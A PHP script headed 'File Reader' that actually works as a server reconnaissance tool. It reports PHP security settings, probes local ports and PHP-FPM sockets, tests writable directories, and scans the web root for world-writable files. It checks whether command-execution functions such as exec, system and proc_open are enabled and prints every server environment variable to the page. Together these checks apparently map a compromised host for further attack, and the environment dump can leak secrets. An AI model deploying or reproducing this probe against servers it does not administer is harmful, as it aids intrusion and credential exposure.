📖 File Reader
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
function section($title){
echo "\n=============================\n";
echo $title."\n";
echo "=============================\n";
}
function line($k,$v){
echo str_pad($k,40)." : ".$v."\n";
}
section("SYSTEM INFORMATION");
line("PHP Version", phpversion());
line("Server Software", $_SERVER['SERVER_SOFTWARE'] ?? 'unknown');
line("Server API", php_sapi_name());
line("Current User", get_current_user());
line("Process UID", posix_getuid() ?? "N/A");
line("Process GID", posix_getgid() ?? "N/A");
line("Document Root", $_SERVER['DOCUMENT_ROOT'] ?? "unknown");
line("Script Path", __FILE__);
line("Operating System", php_uname());
section("PHP SECURITY CONFIGURATION");
$directives = [
'disable_functions',
'open_basedir',
'allow_url_fopen',
'allow_url_include',
'expose_php',
'display_errors',
'log_errors',
'file_uploads',
'upload_tmp_dir',
'cgi.fix_pathinfo',
'max_execution_time',
'memory_limit'
];
foreach($directives as $d){
line($d, ini_get($d));
}
section("LOADED PHP MODULES");
$mods = get_loaded_extensions();
foreach($mods as $m){
echo $m."\n";
}
section("NETWORK INFORMATION");
$hostname = gethostname();
line("Hostname", $hostname);
line("Server IP", $_SERVER['SERVER_ADDR'] ?? "unknown");
line("Client IP", $_SERVER['REMOTE_ADDR'] ?? "unknown");
$local_ports = [9000,9001,8000,8080];
foreach($local_ports as $p){
$conn = @fsockopen("127.0.0.1",$p,$errno,$errstr,1);
if($conn){
line("Open Local Port",$p." OPEN");
fclose($conn);
} else {
line("Open Local Port",$p." CLOSED");
}
}
section("COMMON PHP-FPM SOCKET LOCATIONS");
$sockets = [
"/run/php/php-fpm.sock",
"/run/php/php8.0-fpm.sock",
"/run/php/php8.1-fpm.sock",
"/run/php/php8.2-fpm.sock",
"/var/run/php/php-fpm.sock",
"/tmp/php-fpm.sock",
"/tmp/php-cgi.sock",
"/tmp/php-cgi-73.sock"
];
foreach($sockets as $s){
if(file_exists($s)){
line("Socket Found",$s);
$perms = substr(sprintf('%o', fileperms($s)), -4);
line("Permissions",$perms);
line("Owner UID", fileowner($s));
line("Group GID", filegroup($s));
}
}
section("FILESYSTEM WRITE TESTS");
$paths = [
"/tmp",
"/var/tmp",
"/dev/shm",
$_SERVER['DOCUMENT_ROOT'] ?? ".",
dirname(__FILE__)
];
foreach($paths as $p){
if(is_dir($p)){
line($p, is_writable($p) ? "WRITABLE" : "NOT WRITABLE");
}
}
section("WORLD WRITABLE DIRECTORY SCAN (LIMITED)");
$root = $_SERVER['DOCUMENT_ROOT'] ?? ".";
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($root)
);
$count=0;
foreach($iterator as $file){
if($count>2000) break;
$perms = substr(sprintf('%o', $file->getPerms()), -1);
if($perms >= 6){
echo "Writable: ".$file->getPathname()."\n";
}
$count++;
}
section("DANGEROUS FUNCTION AVAILABILITY");
$functions = [
"exec",
"system",
"shell_exec",
"passthru",
"proc_open",
"popen",
"curl_exec",
"fsockopen",
"file_get_contents",
"stream_socket_client"
];
foreach($functions as $f){
line($f, function_exists($f) ? "ENABLED" : "DISABLED");
}
section("STREAM WRAPPERS");
$wrappers = stream_get_wrappers();
foreach($wrappers as $w){
echo $w."\n";
}
section("ENVIRONMENT VARIABLES");
foreach($_SERVER as $k=>$v){
echo $k." = ".$v."\n";
}
section("PHP INFO SUMMARY");
ob_start();
phpinfo(INFO_GENERAL | INFO_CONFIGURATION | INFO_MODULES);
$info = strip_tags(ob_get_clean());
echo substr($info,0,5000);
section("SCRIPT COMPLETE");
?>